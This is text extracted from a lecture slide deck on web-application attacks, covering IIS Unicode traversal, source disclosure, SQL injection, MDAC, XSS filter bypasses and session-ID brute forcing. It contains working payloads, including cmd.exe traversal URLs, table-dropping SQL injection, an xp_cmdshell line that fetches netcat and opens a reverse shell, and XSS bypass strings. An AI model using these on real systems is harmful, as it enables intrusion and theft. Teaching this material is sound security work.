network security part ii: attacks network security part ii: attacks web attacks

Network SecurityNetwork SecurityPart II: AttacksPart II: Attacks

Web AttacksWeb Attacks

Overview

• Web Architecture• Web Hack Attacks

Web ArchitectureWeb Architecture

• Web applications are important and this importance is accelerating

• Web applications are complex and this complexity is accelerating

This is Not NewThis is Not New•Problems with web applications are the

same problems with standalone applications

Why Target the WebWhy Target the Web

• Everyone is using it• Safe bet the protocol will not become

obsolete anytime soon• New technology is being implemented/

retrofitted on top (e.g. SOAP, WebDAV)• It’s everywhere! Mobile phones, cars,

watches, toasters…• Protocol fundamentally not suited to do

a majority of what it’s doing today

The Trouble with HTTPThe Trouble with HTTP

• Multitude of involved technologies• The involved protocols are extremely

simple; therefore, it is easy to (mis)code services on your own HTTP server

• Lack of experience coding public service type, multi-user applications

• Stateless nature makes transaction based systems tricky

How Did We Get Here?How Did We Get Here?

• Unskilled/robotic programmers (“code mills”)

• Lack of security-oriented programming training

• Tendency to ‘code now, fix later’• Current tools make it very easy to code

insecurely• Misconceptions about what ‘security’

really involves

Trouble Prone Areas of Trouble Prone Areas of the Webthe Web

• Buffer overflows– Classic bug that’s been exploited for quite a

while– Lack of bounds-checking in the language a

majority of web applications are written in combined with poor programming practice

– Can exist in the web server, application server, database server, or the CGI programs

– Fortunately it’s a well-advertised problem– Many scripting languages (ASP, PHP,

Perl, .NET, etc) are generally immune, as they have auto-expanding elements

• Cross-site scripting– Reprinting user data without filtering it for

web-specific characters– Potential to trick users into executing java

script in vulnerable site’s context– Partly a ‘social engineering’ technique– More of a liability than a vulnerability—it’s a

way to hack the users, not the server

• SQL tampering– Web server already has/allows access to the

database server– Attacker can cause arbitrary SQL to be executed– Results vary from data exposure to full system

compromise– Does not require direct database access!– Many applications are vulnerable– Stems from CGIs/scripts making assumptions

about user input and not double checking/filtering

• File includes– It’s common for a CGI to open and display or

manipulate the contents of a file on the server

– If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file

– Can lead to info disclosure or script or command execution

• Authentication weaknesses– CGIs can fail to check credentials with every

request– Thus you bypass the login script and directly

access the following scripts, without needing username/password

– Or, certain actions/functions may not check for the proper authentication

• Weak session mechanism– The session/state mechanism uses

predictable token IDs– Or, the ID keyspace is too small for the

number of users– Either way, an attacker can ‘guess’ a valid

token and hijack the session

Mid Range E-Commerce Mid Range E-Commerce Roll-OutRoll-Out

• Web Server• Application Server• Database Server• … and a Firewall• Maybe some options…

– Load Balancer– Reverse Proxy servers– Cache systems

Typical Web Application Typical Web Application Set-UpSet-Up

WebServer

Web app

WebClient Web app

Web app

HTTPrequest

(cleartext or SSL)

HTTP reply(HTML,

Javascript, VBscript,

Plugins:•Perl•C/C++•JSP, etc

Database connection:•ADO,•ODBC, etc.

SQL Database

•Apache•IIS•Netscape etc…

Firewall

Traditional HackingTraditional Hacking

• Targeted against vulnerabilities in OS components and Network services.– Buffer overflows

• Not portable; attacks specific to operating system architecture, authentication, services, etc.

• Myriad of exploits for different services, OS platforms, CPU architectures, etc.

Traditional HackingTraditional Hacking

• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.

• In short, it is a complex activity with a limited practitioner base.

...winsock_found:

xor eax, eaxpush eaxinc eaxpush eaxinc eaxpush eaxcall socketcmp eax, -1jnz socket_ok

push sockerrlpush offset sockerrcall write_consolejmp quit2

socket_ok:mov sock, eaxmov sin.sin_family, 2mov esi, offset _port

Limitations of Limitations of Traditional Hacking…Traditional Hacking…

• Modern network architectures are getting more robust and secure.

• Firewalls being used in almost all network roll-outs.

• OS vendors learning from past mistakes (?) and coming out with patches rapidly.

• Increased maturity in coding practices.

Utility of FirewallsUtility of Firewalls

WebServer

Web app

SQL Database

Firewall

wu-ftpdSun RPC

NT ipc$XXX

Hacks on OS Hacks on OS network network services services

prevented by prevented by firewallsfirewalls

Limits Traditional hacking

WebServer

Web app

SQL Database

Firewall

Internal back-end application servers are on a non-routable IP network.

(Private Addresses)

WebServer

Web app

SQL Database

Firewall

XOutbound access

restricted. Why would a web server telnet

Futility of FirewallsFutility of Firewalls

• Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.

• HTTP is perceived as friendly traffic• Why lay siege to the wall when you have

a open door.• Attacks that based on

Content/Applications applications are still viewed by some as rare.

Tools Required for Web Tools Required for Web HackingHacking

• A web browser• An Internet connection• ….a clear mind and some spare time!

A Classification of Web A Classification of Web HacksHacks

• Web attacks fall under the following general categories:– Buffer overflow attacks– SQL injection attacks– Input validation attacks– URL interpretation attacks– Impersonation attacks

Firewalls Cannot Firewalls Cannot Prevent…Prevent…

WebServer

WebClient

Web server misconfiguration

Firewall

• Complexity Complexity mismanagementmismanagement

• IndifferenceIndifference

Attack the ArchitectureAttack the Architecture

Java Runtime

WebServer

htmlhandler

text/htmlheader

/bin/sh

includefile

text/htmlheader

ProcessSSI tags

#exec#include

script/execu--table

ProcessJSP tags

JavaCompiler

shtmlhandler

jsphandler

defaulthandler

cgihandler

text/htmlheader

cgish,perl,…

Web Server Architecture Web Server Architecture AttacksAttacks

• Complex web server architectures are can lead to implementation vulnerabilities.

• A common attack is to bypass the web server configuration directives, and invoke the built-in procedures directly.

• A close look at the web server architecture can reveal security problems.

Architecture Architecture MisconfigurationsMisconfigurations

• Handler Forcing:– Certain mis-configurations allow handlers to

be forced onto files that are not supposed to be processed by them.

– Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.

• Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine

JSP Handler ForcingJSP Handler Forcing

WebServer

ProcessJSP tags

JavaCompiler

jsphandler

htmlhandler

htmltext/htmlheader

JSP PageCompile

handler forced on to html files

Java Runtime

WebServer

WebClient

Poor checking of user inputs

Web app

URLInterpretation attacks

Firewall

• Input validation attacks

URL Interpretation URL Interpretation AttacksAttacks

• Several well known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000, have been wrapped into a common definition: "The Unicode Bug."

• URL Parsing vulnerability.• Improper handling of illegal Unicode sequences.• Allows remote users to execute arbitrary

commands on the web server under the context of IUSR.

• Can lead to potential Administrator level access.

The IIS Unicode BugThe IIS Unicode Bug

• Exploit:http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

– attacker could view a directory listing of a server's C:\ drive

• %c0%af = “/”• Can use HTTP POST to send

multiple commands at a time to cmd.exe.

Web Hacking for Collateral Web Hacking for Collateral DamageDamage

• Web hacking can result in three types of collateral damage.

1. Information disclosure (paths etc.)• Arbitrary file content and source code leakage

2. Data disclosure (i.e. return all rows)3. Arbitrary command execution

Source Code DisclosureSource Code Disclosure

"Use the Source, Luke!“

• WebLogic / WebSphere “JSP” bug1. • Ability to retrieve source code of

JSP/JHTML files.• Using uppercase “JSP” in the URL causes

the server to return unparsed JSP code.

1. Discovered by Shreeraj Shah, Foundstone.

A Classic Case of “Handler A Classic Case of “Handler Mismatch." Mismatch."

Java Runtime

index.jspProcessJSP tags

JavaCompiler

jsphandler

defaulthandler

index.JSP = index.jsp

htmlhandler

shtmlhandler

jhtmlhandler

weblogic.httpd.register.file=weblogic.servlet.FileServlet

weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet

weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet

weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet

HTTP Request:index.JSP

More Source DisclosureMore Source Disclosure

• URL prefixes for source code disclosure1:/servlet/file/ (IBM WebSphere)/file/ (BEA WebLogic)/*.shtml/ (BEA WebLogic)/ConsoleHelp/ (BEA WebLogic)/servlet/com.sun.server.http.servlet.FileServlet/

(Sun JavaWebServer)

1 Advisories located on: http://www.foundstone.com/advisories.htm

……I Thought it was I Thought it was FunctionalityFunctionality

• IIS “+.htr” bug.– View source code of ASP/ASA files.– URL interpretation vulnerability.

http://10.0.0.1/global.asa+.htr

– “.htr” causes ISM.DLL to handle the URL.– Characters after the “+” sign (space) are

ignored.

Doom on You….Doom on You….

<SCRIPT LANGUAGE="VBScript" RUNAT="Server">Sub Application_OnStart Set Db = Server.CreateObject("Commerce.DbServer") Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c" Db.Application = "http://10.1.1.16/" Set Application("Db") = DbEnd SubSub Session_OnStart '==Visual InterDev Generated - DataConnection startspan== '--Project Data Connection Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25; FIL=MS Access;MaxBufferSize=512;PageTimeout=5;" Session("DataConn_ConnectionTimeout") = 15 Session("DataConn_CommandTimeout") = 30 Session("DataConn_RuntimeUserName") = "" Session("DataConn_RuntimePassword") = "" '==Visual InterDev Generated - DataConnection endspan==End Sub</SCRIPT>

User ID: sa

Password: n0t4u2c

More Source DisclosureMore Source Disclosure

• Some applications access files without appropriate checking.

• Input validation vulnerability.• No checking performed for file type or

location.• Filenames can be manipulated via

parameters passed on the URL or as hidden fields.

NT IIS Showcode ASP NT IIS Showcode ASP VulnerabilityVulnerability

• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0

• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.

http://www.someserver.com/msadc/Samples/SELECTOR/Showcode

asp?source=/msadc/Samples/../../../../../boot.ini

WebServer

Web app

WebClient Web app

Web app

HTTPrequest

(cleartext or SSL)

Input validation attacks

Extend SQL statements

SQL Database

URL Interpretation attacks

Firewall

• SQL Query Poisoning

SQL Query PoisoningSQL Query Poisoning

• Poor input validation on parameters passed to SQL queries can be disastrous.

• Return all rows:http://10.0.0.3/showtable.asp?ID=3+OR+1=1

• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 OR 1=1

• Drop Table:http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT

• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT

• Remote Command Execution!http://10.0.0.3/showtable.asp? ID=3%01EXEC+master..xp_cmdshell+

‘tftp+-i+10.0.0.13+GET+nc.exe+

%26%26+nc+-e+cmd.exe+10.0.0.11+2000’

• Command executed:tftp -i 10.0.0.13 GET nc.exe &&

nc -e cmd.exe 10.0.0.11 2000

SQL Remote CommandoSQL Remote Commando

tftpserver

nc.exe

WebBrowser

listener at port 2001 to receive the connection

tftp server to get nc.exe transferred over to the NT IIS box.

SELECT * FROM PRODUCT WHERE ID=3EXEC master..xp_cmdshell tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000

WebServer

Web app

WebClient Web app

Web app

Reverse engineering HTTP

cookies

Input validation attacks

SQL query poisoning

SQL Database

URL Interpretation attacks

Firewall

HTTP session hijacking

•Impersonation

WebServer

Web app

WebClient Web app

Web app

HTTPrequest

(cleartext or SSL)

HTTP reply(HTML,

Javascript, VBscript,

Plugins:•Perl•C/C++•JSP, etc

Database connection:•ADO,•ODBC, etc.

SQL Database

•Apache•IIS•Netscape etc…

Firewall

•Application bugs

The MDAC AttackThe MDAC Attack• Vulnerability with Microsoft Data Access

Components (msadcs.dll).• MDAC allows remote users to perform

SQL queries without authentication.• Only the DSN needs to be known.• SQL queries can be crafted to execute

arbitrary commands.

The MDAC AttackThe MDAC AttackClient Server

Internet Explorer

or VB.exe

RDS Data

Control

OBDC Provider

RDS Data

Custom Business Objects

Data Factory

Jet Provider Jet

Remote Data Service

Server

msadcs.dll

The MDAC AttackThe MDAC Attack

• Exploit:

$query="Select * from Customerswhere City='|shell(\"$command\")|'";

$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

• Gain Administrator Privileges on NT!

The MDAC Attack in The MDAC Attack in ActionAction

IIS 4.0

DBmsadcs

tftpserver

nc.exe

mdac.pl(exploit)

listener at port 2001 to receive the connection

tftp server to get nc.exe transferred over to the NT IIS box.

SELECT * FROM Customers WHERECity = “|shell($command)

The Effectiveness of Web The Effectiveness of Web HackingHacking

• By default ports 80 and 443 are usually allowed through firewalls. The open door…

• A single URL string is able to be processed by many different components.

• In most cases the only defense is reliance on secure coding.

Missile of DeathMissile of Death

WebServer

Web app

http: // 10.0.0.1 / catalog / display.asp ? pg = 1 & product = 7

Cross Site Scripting, Cross Site Scripting, Why You Should Care.Why You Should Care.

•XSS is not an attack on the server, it is an attack on the users of your application

•So what?– Identity theft– User masquerading – Reputation Risk

Cross Site Scripting Cross Site Scripting (XSS)(XSS)

•Found in 98% of applications•2 main types

– Transient (URL basedPhttp://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>

– Sticky – Script placed in a static bit of web content

XSS continued…XSS continued…

•Transient generally requires user interaction

•What can happen?– Possibilities are only restricted by the client– Cookie theft most common example

•But I filter “<“ and “>”– Jscript entities “&{alert(‘Test')};”

Session HijackingSession Hijacking

•HTTP is stateless so application designers must build a way to track state

•Cookies and URL strings are the most common ways to track state

•Both are easily exploitable

Session Hijacking Session Hijacking Continued…Continued…

•Generally the next thing to occur after XSS

•Examples of common session tracking issues

Parameter TamperingParameter Tampering

•Programmers will store data anywhere!– URL parameters

http://badapp.com/checkout.pl?p=$1.00– Cookies – Cookie:p=$1.00– Hidden fields – not really hidden

Unbound File CallsUnbound File Calls

•Ye Ole’ ../../•Becomes an issue with the display

important information (global.asa)•Most application languages will take

URL’s as file arguments

Do You Know Where Do You Know Where Your Data is?Your Data is?

•Building an exclusionary filter is difficult because your data is all over the place

Data Flow ExampleData Flow Example

Internet

Customer Service

Database

Marketing Database

Database

Orders Database

www.hackme.com

Designing a proper Designing a proper filterfilter

•Make all filters default deny– Don’t try to exclude “bad stuff”

•Requires a good idea where your data is going

•Log all filter violations

Filter Bypassing is a Filter Bypassing is a Technique to Evade Technique to Evade

Detection by Filtering Detection by Filtering Systems.Systems. • Filter Bypassing techniques come in many varieties

when applied to the many facets of web application security.

• The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.

• Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination.

Most filter systems are Most filter systems are very simplevery simple

Seven forms of ingenuity:• URL Encoded Strings• Double Hex Encoding• Unicode Encoded String• Long URLs• Case Sensitivity• XSS Filter-Bypass Manipulation• Null Character Injection

The Hex AdvantageThe Hex Advantage

By URL hex encoding URL strings, it may be possiblecircumvent filter security systems and IDS.

http://foo.com/cgi?file=/etc/passwd

Can become:

http://foo.com/cgi?file=/%2F%65%74%63

%2F%70%61%73%73%77%64

Double Hex EncodingDouble Hex Encoding

• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.

• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.

• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.

• When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.

• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.

• This secondary decoding was the source of another Vulnerability.

IIS Double HexIIS Double Hex

Round 1 Decoding:scripts/..%255c../winntbecomes:scripts/..%5c../winnt(%25 = “%” Character)

Round 2 Decoding:scripts/..%5c../winntbecomes:scripts/..\../winnt

Directory path traversal is now possible using path obfuscation through Double

Hex Encoding.

The Unicode SlashThe Unicode Slash• In unicode, “%c0%af”, is the equivilent to a

slash (“/”). • Therefore the common URL IIS exploit:

scripts/..%c0%af../winnt

• becomes: scripts/../../winnt

Once again, directory path traversal is now possible using path obfuscation

through Unicode.

Double SlashDouble Slash

•Double Slash using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd.

•Can be used to move under the radar of IDS systems and still function properly.

•Many system put limits on how much data a variable can store or a system can handle.

•Often times if these limits are exceeded, the data will still be used, but bypass certain security considerations.

• URL’s such as:http://www.foo.com/cgi?param=filename

• Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>

Long URL’sLong URL’s

Case SensitivityCase Sensitivity

• Case sensitivity may play a roll in many security filtration systems.

• Alternating case on URL parameters may be used to bypass certain restrictions.

http://foo.com/cgi?param=barhttp://foo.com/cgi?param=BaRhttp://foo.com/CGI?param=BAR

Method SwitchingMethod Switching

• Many web applications do not properly perform HTTP Request Method sanity checking.

• Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.

• Most web servers do not log "POST" data and thus forensic analysis is harder to perform.

The Request Method: GET /cgi-bin/some.cgi

can become: POST /cgi-bin/some.cgi

The Method token indicates the method to be performed on the resource identified by the Request-URI.

HTTP 1.1 MethodsHTTP 1.1 Methods

• OPTIONS• GET• HEAD• POST • PUT• DELETE• TRACE• CONNECT

Using your “HEAD”Using your “HEAD”

• The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.

Scans and web application attacks can be made to be more effective using this technique.

Null Character InjectionNull Character Injection• Hex encoded null characters

can be used to thwart some security mechanisms.

• This happens because in the “C” programming language, a null character designates the end of a string.

• So If a CGI appending a “.html” to an input parameter:http://foo.com/cgi?file=../../etc/passwd%00

• Will cut off appending “.html”.

Unicode (UTF-8) Unicode (UTF-8) EncodedEncoded

• Unicode is a universal way to represent characters.

• However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.

• Microsoft IIS has had security issues in the past while supporting unicode.

URL Encoded StringURL Encoded String

• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:

• "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."

XSS Filter-Bypass XSS Filter-Bypass ManipulationManipulation

• This technique is used pass various types of client-side scripting language through implemented security filters.

• The idea is to be able to achieve client-side execution of a client-side script.

• There are several techniques used to perform this attack.

Hammer the FiltersHammer the Filters

•Submit all the raw HTML tags you can find, and then view the output results.

•Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).

•This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.

SRCing the ProtocolSRCing the Protocol

•Using the “javascript” protocol in an HTML source attribute.

Alternate Protocol Alternate Protocol SRCingSRCing

•Same technique as the previous, however, using the protocol “livescript” and “mocha” will yield the same effect.

Decimal HTML EntitiesDecimal HTML Entities

•Variation on previous techniques, using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.<IMG SRC=“java
script:js_expression">

•\09 \10 \11 \12 \13 have all been seen to work

Hex HTML EntitiesHex HTML Entities

•Another variation on the previous example, HEX HTML entities may also be used to bypass filter restriction, yet execute JavaScript.<IMG SRC=“java&#X0A;script:js_expression">

Padding HTML EntitiesPadding HTML Entities

•Padding HTML entities with “0’s” may also be used to bypass the filters, yet still execute JavaScript.

STYLE JavaScript TypeSTYLE JavaScript Type•Changing the MIME-TYPE on a “style” tag

may be used to execute JavaScript.

STYLE JavaScript X-STYLE JavaScript X-TypeType

•Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.

alert('JavaScript has been Executed');

</STYLE>

STYLE JavaScript STYLE JavaScript ImportImport

•Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.

@import url(javascript:alert('Javascript is executed'));

</style>

STYLE URL ImportSTYLE URL Import

•Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.

@import url(http://www.test.com);

</STYLE>

LINK Style SheetLINK Style Sheet

•The “LINK” tag can be used to import JavaScript from a remote HTTP resource.

Style Left ExpressionStyle Left Expression

•A few CSS features used together to execute JavaScript.

<PSTYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >

Remote SRCingRemote SRCing

•A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in JavaScript from remote resources.

……AND CURLYAND CURLY

•Syntax must be exact.

Dangerous HTML TagsDangerous HTML Tags

•“All HTML is to be considered dangerous, but these tags are the most insidious.”

– <APPLET>– <BODY>– <EMBED>– <FRAME>– <FRAMESET>– <HTML>– <IFRAME>– <IMG>– <LAYER>– <ILAYER>– <META>– <OBJECT>– <SCRIPT>– <STYLE>

Dangerous HTML Dangerous HTML AttributesAttributes

•(HTML Tags with these attributes.)– SRC– LOWSRC– STYLE– HREF

Web Applications LoginsWeb Applications Logins

Traditional Brute ForceTraditional Brute Force

123123

Password

Session ID OverviewSession ID Overview

•HTTP is stateless protocol•Rather than make a user authenticate

upon each click in a web application, a sense of “state” is created

•In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers

•Essentially, authentication data (username/password) exchanged for “Session ID”

Web State AttacksWeb State Attacks

•Session Replay– A traditional replay attack in the cryptography

sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.

•Session Hijacking– Seizing control of a legitimate user's web

application session while that user is “logged in” to the application

Session IDSession ID

• Session ID should IN THEORY be just as secure as username/password

• While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are also just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).

• Session IDs are commonly stored in cookies and/or URLs, and hidden fields of web pages (or some combination)

• Session ID generated by WEB SERVER (IIS, etc.) when the user first hits the site or by WEB APPLICATION (ATG dynamo, Apache Tomcat, BEA Websphere, .jsp, .asp, perl, etc.) when the user logs in

Cookie RefresherCookie Refresher

• Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies

• Persistent cookies last beyond a user’s session (i.e. “Remember Me” option)

• Persistent cookies are usually stored on the user’s hard drive in a location according to the particular operating system and browser (e.g. , C:\Program files\netscape \users\username\cookies.txt for Netscape and C:\Documents and Settings \username\Cookies for IE on Win2K).

Cookie RefresherCookie Refresher•Cookie Refresher (RFC 2965)

1.) domain: The website domain that created and that can read the variable. 2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can

access the variable.3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed

to access the variable. 5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the

number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed. (expires July 27, 2006)

6.) name: The name of the Session ID variable (in this case Apache).

7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480 ) .

www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480

1 2 3 4 5 6 7

Cookie Stored Session ID Cookie Stored Session ID ExamplesExamples

.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2

.yahoo.com TRUE / FALSE 1271361612 B 3qpaarsu48dai&b=2

.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034

.ebay.com TRUE / FALSE 1183296824 lucky8 694036

.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie

13fe8fff4799f27dcf19c959dafa8437

.yahoo.com TRUE / FALSE 1154029490 I ir=9p&in=4aweec66&i1=AFABCl

.yahoo.com TRUE / FALSE 1154029490 PU t=1

URL Stored Session IDURL Stored Session ID

• http://www.123greetings.com/view/7AD30725122120803 • http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB • http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122

• http://www.amazon.com/exec/obidos/subst/home/home.html/102-4524380-3923344

Session IDs in HTML Session IDs in HTML Hidden FieldsHidden Fields

Session ID Session ID SecuritySecurity Overview Overview

Session ID security is a microcosm of Web Application Security.

Web Application Security cuts through many different aspects of an organization’s information security infrastructure

An Example: Brute Forcing Session An Example: Brute Forcing Session ID’s in URLSID’s in URLS

Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you. --------Method 1-------- Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.)

http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html

An Example: Brute An Example: Brute Forcing Session ID’s in Forcing Session ID’s in

URLSURLShttp://www.123greetings.com/view/AD30725122116211

http://www.123greetings.com/view/AD30725122118909

As we start to associate that the date we sent these electronic cards on was July 25 at 12:21 PST, we can start to eliminate some more entropy out of this session ID (07251221). Notice then that we’re left with five incrementing “random” digits at the end of the URL. http://www.123greetings.com/view/AD30725122116211http://www.123greetings.com/view/AD30725122118909http://www.123greetings.com/view/AD30725122120803http://www.123greetings.com/view/AD30725122122507http://www.123greetings.com/view/AD30725122124100

An Example: Brute Forcing An Example: Brute Forcing Session ID’s in URLS Session ID’s in URLS AUTOMATED DEMO!AUTOMATED DEMO!

Why Brute Forcing Web Why Brute Forcing Web Session ID’s is BadSession ID’s is Bad

• Can result in an online user’s web application account being hijacked or loss of privacy

• Easy to exploit• Unlike typical login scenario, no failed login

lockout• Prevalent disclosure among security mailing lists• Typical security solutions (firewalls, IDS, etc.) do

nothing to detect attacks• Log data is usually not that detailed• IDS is not well developed for Web Application

attacks• SSL (Server side) does nothing to protect

against these attacks

In the NewsIn the News– “Privacy hole found in Verizon

Wireless Web site “ Computerworld, Sept 6, 2001.http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.htmlhttp://online.securityfocus.com/archive/1/211520

– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION

URL Example: Brute Forcing URL Example: Brute Forcing Register.comRegister.com

Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your e-mail program supports HTML, you may be able to click on the link below. http://mydomain.register.com/change_password.cgi?155218782787 Note: Above link will be expire within three days

Example 2: Brute Forcing Web Example 2: Brute Forcing Web Session ID’sSession ID’s

http://mydomain.register.com/change_password.cgi?486218782865http://mydomain.register.com/change_password.cgi?440218782891 http://mydomain.register.com/change_password.cgi?685218782917 http://mydomain.register.com/change_password.cgi?505218782956 http://mydomain.register.com/change_password.cgi?435218782969

http://mydomain.register.com/change_password.cgi?486218782865 http://mydomain.register.com/change_password.cgi?440218782891http://mydomain.register.com/change_password.cgi?685218782917http://mydomain.register.com/change_password.cgi?505218782956http://mydomain.register.com/change_password.cgi?435218782969

URL Example – Brute Forcing URL Example – Brute Forcing Dfilm.comDfilm.com

-----Original Message-----

From: test@test.com [mailto:test@test.com]

Sent: Monday, July 01, 2002 1:38 PM

To: dendler@idefense.com

Subject: D.FILM Digital Movie for Dave

Dave created a digital movie for you!

You can view it at the following URL:

http://mm.dfilm.com/mm2s/mm_route.php?id=110532

Cheers,

Dave and DFILM.

Be sure to check out the web site at http://www.dfilm.com

URL Example – Brute Forcing URL Example – Brute Forcing Dfilm.comDfilm.com

No privacy of other user’s creations:

http://mm.dfilm.com/mm2s/mm_route.php?id=…

URL Example – Sendomatic.comURL Example – Sendomatic.com

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330

URL Example – Sendomatic.comURL Example – Sendomatic.comView other people’s events. Crash a party, edit an event, cancel and event, etc.

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336http://www.sendomatic.com/servlets/servlets/mysendo?uId=…

Cookie Example – Freeservers.comCookie Example – Freeservers.com

•LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;

• Base 64 decode the string: http://www.securitystats.com/tools/base64.asp

testing123.itgo.com:1231234 username:password

• Next, automate it with a perl exploit by feeding encoded strings in to the cookie

Cookie Example – Freeservers.comCookie Example – Freeservers.com

%perl freeservershack.pltrying testtrying test123trying 123123trying 1231234 Cracked it! The password to testing123.itgo.com is 1231234

GET http://testing123.itgo.com/cgi-bin/util/my_member_area

User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3DCookie2: $Version=1 %

Cookie Example – Cookie Example – Freeservers.comFreeservers.com

• Or a much longer way: use the brute forcer on every single cookie character combination

Cookie/URL Example – Cookie/URL Example – Amazon.comAmazon.com

• Some sites use the URL AND Cookie for authentication:

6 Common Problems6 Common Problems

• Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address.

• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.

• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string’s key space is not sufficiently large.

6 Common Problems – Continued6 Common Problems – Continued

• Indefinite Expiration on Server– Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID.

• Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network taking the guess-work away for a miscreant. This is still a problem with proxy servers.

• Insecure Retrieval – By tricking the user’s browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user’s sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.

ToolsTools

• Sessions Auditorwww.idefense.com/idtools/Session_Auditor.zip

• Visual Testing – WebSleuthwww.geocities.com/dzzie/sleuth

